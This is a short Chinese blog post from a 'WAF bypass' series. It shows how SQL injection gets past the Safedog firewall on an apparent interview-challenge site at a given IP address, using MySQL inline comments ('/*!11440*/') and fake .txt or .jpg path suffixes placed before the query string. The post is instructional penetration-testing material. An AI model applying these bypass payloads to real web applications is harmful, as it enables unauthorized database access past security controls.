【绕WAF系列】另类的绕狗姿势


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


 

在原文章链接:一个面试题 看到的文章觉得挺有意思的,所以也去试了一下。

    之前网上说过,利用脏数据(垃圾字符),来绕WAF,是可以的,有脚本可以绕,也可以尝试Fuzz 看看哪些是规则之外的来组合绕过。

看到tools 师傅的一句话,把我... ... 如下:

绕过安全狗的另一种方法,可能安全狗认为txt和jpg文件是安全的,所以可以使用.txt和.jpg来绕过安全狗

面试题链接:

             http://111.73.45.72/1.aspx?id=1

                      

尝试一下,简单判断一哈。

有安全狗WAF... ...,这... ...为什么只要是做靶场就拿狗来出气,我勒个去(/哭笑不得)

使用/*!11440*/绕过

order/*!11440*/by 5

确定了八个字段

我去... ...,好像很多人都在使用.. ...,那就不测试了,看原文章作者所说的,没啥特别奇怪的,就是常规手段即可通关,这关主要考察的是你有没有绕WAF的知识

PS:出现如下链接,可能时太多人进行测试了,导致连接池饱满

 

此处主要是想说的是... ...

http://111.73.45.72/1.aspx?id=1 order by 8

?id前面加1.txt,成功绕过?

http://111.73.45.72/1.aspx/1.txt?id=1 order by 8

?id前面加1.txt,成功绕过?

http://111.73.45.72/1.aspx/1.txt?id=1 order by 8

?id前面加1.jpg,成功绕过?

http://111.73.45.72/1.aspx/1.jpg?id=1 order by 8

 

参考链接:

                  https://www.t00ls.net/articles-56550.html


虽然我们生活在阴沟里,但依然有人仰望星空!


 

猜你喜欢

转载自blog.csdn.net/God_XiangYu/article/details/106405226
今日推荐